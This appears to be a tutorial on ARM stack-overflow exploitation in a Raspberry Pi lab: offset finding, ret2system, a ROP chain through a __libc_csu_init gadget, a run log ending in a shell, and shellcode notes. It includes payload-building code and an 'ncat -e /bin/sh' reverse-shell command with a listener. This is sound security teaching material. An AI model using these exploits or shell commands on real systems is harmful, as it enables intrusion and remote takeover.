See this to set up your environment.
Use pattern.py to find the offset of the return address.
./pattern.py create 30
./pattern.py offset string
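The idea behind a pattern tool can be sketched in a few lines of Python 3. This is not the source of pattern.py, only a minimal illustration that assumes the common Aa0Aa1Aa2... cyclic pattern; the function names `pattern_create` and `pattern_offset` are hypothetical.

```python
import string


def pattern_create(length):
    """Return `length` characters of an Aa0Aa1Aa2... style cyclic pattern."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    raise ValueError("requested pattern is longer than this sketch supports")


def pattern_offset(needle, length=1024):
    """Return the index of `needle` in the pattern, or -1 if it is absent.

    `needle` is the 4 characters as they appear in memory; a register value
    read on a little-endian target has to be byte-reversed first.
    """
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(30))
```

Feed the pattern to the program, note which four characters end up in pc when it crashes, and look them up with `pattern_offset`.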
This is similar to Intel assembly: first the return address (the lr register) is pushed onto the stack, and then the frame pointer (r11). Once you have confirmed the offset, overwrite the return address with the address of donuts.
./test `python -c "print '1234567890123456\x9c\x04\x01\x00'"`
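The same payload can be built with `struct` instead of hand-written escape bytes, which avoids byte-order mistakes. This is a Python 3 sketch; the offset and the address are taken from the command above, while `build_payload` is a hypothetical helper name.

```python
import struct

OFFSET = 16                # padding before the saved return address (from the command above)
DONUTS_ADDR = 0x0001049C   # address of donuts (from the command above)


def build_payload(offset, address, filler=b"A"):
    """Pad up to the saved return address, then append it in little-endian order."""
    return filler * offset + struct.pack("<I", address)


payload = build_payload(OFFSET, DONUTS_ADDR)

if __name__ == "__main__":
    print(payload)
```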
Turn off ASLR and get the address of system. In this case we don't need to set the argument ourselves, because r0 is not changed before the function returns and we can make it point to a string that contains '/bin/sh;'.
./test `python -c "print '/bin/sh;##123456\x54\xb1\xe9\x76'"`
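The layout of that argument can be sketched as follows (Python 3). The command is terminated with ';' and padded with '#' up to the offset, on the assumption that the shell treats everything after the '#' as a comment, so the address bytes that follow are ignored by system. `system_payload` is a hypothetical helper; the offset and address come from the command above.

```python
import struct

OFFSET = 16               # distance to the saved return address
SYSTEM_ADDR = 0x76E9B154  # address of system with ASLR off (from the command above)


def system_payload(command, offset, system_addr, pad=b"#"):
    """Place `command;` at the start of the buffer and pad with '#' up to `offset`."""
    prefix = command + b";"
    if len(prefix) > offset:
        raise ValueError("command does not fit before the return address")
    return prefix + pad * (offset - len(prefix)) + struct.pack("<I", system_addr)


payload = system_payload(b"/bin/sh", OFFSET, SYSTEM_ADDR)

if __name__ == "__main__":
    print(payload)
```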
This is similar to ROP on x86_64: you need to find gadgets that set the arguments. A function call takes its first four arguments in r0, r1, r2 and r3, and any further arguments are pushed onto the stack. The frame pointer (r11) does not always have to be pushed onto the stack, but lr must be. The return value is placed in r0; a 64-bit value uses r0 and r1, with r1 holding the high 32 bits and r0 the low 32 bits. There is also a powerful gadget in __libc_csu_init:
.text:000104F8 ADD R4, R4, #1
.text:000104FC LDR R3, [R5],#4
.text:00010500 MOV R2, R9
.text:00010504 MOV R1, R8
.text:00010508 MOV R0, R7
.text:0001050C BLX R3 ; frame_dummy
.text:00010510 CMP R6, R4
.text:00010514 BNE loc_104F8
.text:00010518 LDMFD SP!, {R4-R10,PC}
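One possible way to drive this gadget is sketched below in Python 3. rop.py itself is not reproduced here, so this is an illustration rather than the actual script. It assumes the chain starts at the saved return address, that the called function returns normally, and that r5 points to a word holding the target address (for example a GOT entry). `csu_call` and its parameters are hypothetical names.

```python
import struct

CSU_POP = 0x00010518   # LDMFD SP!, {R4-R10,PC}
CSU_CALL = 0x000104F8  # ADD R4, R4, #1 ... BLX R3


def p32(value):
    """Pack a 32-bit little-endian word."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def csu_call(func_ptr_addr, arg0, arg1, arg2, next_pc):
    """Build a chain that calls *func_ptr_addr(arg0, arg1, arg2), then jumps to next_pc."""
    chain = p32(CSU_POP)         # overwrites the saved return address
    # Words popped by LDMFD SP!, {R4-R10,PC}:
    chain += p32(0)              # r4: becomes 1 after ADD R4, R4, #1
    chain += p32(func_ptr_addr)  # r5: LDR R3, [R5],#4 loads the target from here
    chain += p32(1)              # r6: equals r4 after the increment, so BNE is not taken
    chain += p32(arg0)           # r7 -> r0
    chain += p32(arg1)           # r8 -> r1
    chain += p32(arg2)           # r9 -> r2
    chain += p32(0)              # r10: unused
    chain += p32(CSU_CALL)       # pc: enter the call part of the gadget
    # After BLX returns, execution falls through to LDMFD again:
    chain += p32(0) * 7          # r4-r10: filler
    chain += p32(next_pc)        # pc: where to go next
    return chain
```

Because the gadget ends in the same LDMFD, several such calls can be chained by pointing `next_pc` at `CSU_POP` handling of the next block, or at any other gadget.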
Surprised? Yes, just do as you've learned! See rop.py for the details. Finally we get a shell.
pi@raspberrypi:~/arm_exploit/rop $ python rop.py
[!] Pwntools does not support 32-bit Python. Use a 64-bit release.
[+] Starting local process './rop': pid 17466
[*] '/home/pi/arm_exploit/rop/rop'
Arch: arm-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x10000)
[*] '/home/pi/arm_exploit/rop/libc.so.6'
Arch: arm-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
go
[+] write_addr: 0x76ea8140
[+] system_addr: 0x76e1e154
[*] Switching to interactive mode
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
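The two addresses printed in the log are related through the libc load address. rop.py is not shown here, so the following Python 3 sketch only illustrates the usual leak-then-rebase arithmetic; `rebase` and its offset parameters are hypothetical, and the real symbol offsets would have to be read from libc.so.6.

```python
WRITE_ADDR = 0x76EA8140   # write_addr from the log above
SYSTEM_ADDR = 0x76E1E154  # system_addr from the log above


def rebase(leaked_addr, leaked_offset, target_offset):
    """Derive a runtime address from one leaked address and two libc offsets."""
    libc_base = leaked_addr - leaked_offset
    return libc_base + target_offset


# Whatever the real offsets are, their difference must match the log.
delta = WRITE_ADDR - SYSTEM_ADDR

if __name__ == "__main__":
    print(hex(delta))
```

For the run above the difference is 0x89fec, so system sits that many bytes below write in this libc.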
Finally, let's look at how to write shellcode for the ARM architecture. The first thing to note is that, unlike MIPS, ARM has no cache incoherency problem when executing your shellcode. Syscalls on x86 and ARM:
x86                 ARM (r0-r5)
eax = sysnum        r7 = sysnum
ebx = arg1          r0 = arg1
ecx = arg2          r1 = arg2
edx = arg3          r2 = arg3
…                   …
int 0x80            svc #0x80 / svc #0
eax = ret-value     r0 = ret-value
You can see the syscall numbers here. The main problem you will face is the NULL character, so you need to find ways to avoid it. After you have finished your shellcode, compile it:
gcc shellcode.s -o shellcode -nostdlib
Writing shellcode yourself is a bit hard, so you can also just find some online. Another point is that Thumb mode reduces the chance of null bytes simply because its instructions are shorter, so use it whenever you can.
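A quick way to check assembled shellcode for NULL characters is sketched below in Python 3. The two byte strings are the little-endian encodings of `mov r0, #0` in ARM mode and `eors r0, r0` in Thumb mode, used only as a small comparison; `null_offsets` is a hypothetical helper name.

```python
def null_offsets(code):
    """Return the offsets of all NULL bytes in a blob of machine code."""
    return [i for i, byte in enumerate(code) if byte == 0]


ARM_MOV_R0_0 = bytes.fromhex("0000a0e3")  # mov r0, #0   (ARM mode, 4 bytes)
THUMB_EORS_R0 = bytes.fromhex("4040")     # eors r0, r0  (Thumb mode, 2 bytes)

if __name__ == "__main__":
    print(null_offsets(ARM_MOV_R0_0))
    print(null_offsets(THUMB_EORS_R0))
```

Both instructions clear r0, but only the Thumb encoding is free of NULL bytes.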
There are 2 types of shellcode to get a shell: reverse shell and bind shell.
Reverse shell: connects to an IP address and port and provides shell access.
• socket - create a socket
• connect - connect to IP/PORT
• dup2 - redirect stderr
• dup2 - redirect stdout
• dup2 - redirect stdin
• execve - call /bin/sh
For example, run this command on the target system:
ncat -e /bin/sh yourip yourport
And listen on your own system:
nc -l -p yourport -vvv
Bind shell: binds a socket to a port and provides shell access.
• socket - create a socket
• bind - bind a socket to IP/PORT
• listen - listen on the created socket
• accept - accept incoming connection
• dup2 - redirect stderr
• dup2 - redirect stdout
• dup2 - redirect stdin
• execve - call /bin/sh
We usually use a bind shell.
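The dup2 steps shared by both lists can be illustrated locally without any network access. The Python 3 sketch below uses a socketpair in place of a connected or accepted socket and lets `subprocess.Popen` attach the socket to the child's stdin, stdout and stderr, which has the same effect as the three dup2 calls. `run_over_socket` is a hypothetical name, and this only demonstrates the redirection, not shellcode.

```python
import socket
import subprocess


def run_over_socket(command):
    """Run `command` in /bin/sh with fds 0, 1 and 2 attached to one socket."""
    parent_end, child_end = socket.socketpair()
    fd = child_end.fileno()
    # Popen duplicates `fd` onto 0, 1 and 2 in the child (the dup2 steps).
    proc = subprocess.Popen(["/bin/sh", "-c", command],
                            stdin=fd, stdout=fd, stderr=fd)
    child_end.close()  # the parent keeps only its own end of the pair
    chunks = []
    while True:
        data = parent_end.recv(4096)
        if not data:   # empty read: the child has exited and closed its end
            break
        chunks.append(data)
    proc.wait()
    parent_end.close()
    return b"".join(chunks)


if __name__ == "__main__":
    print(run_over_socket("echo hello"))
```

Everything the shell writes arrives on the other end of the socket, which is what the peer of a reverse or bind shell sees.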
Here is the shellcode for execve("/bin/sh", NULL, NULL). Here is the shellcode for a bind shell.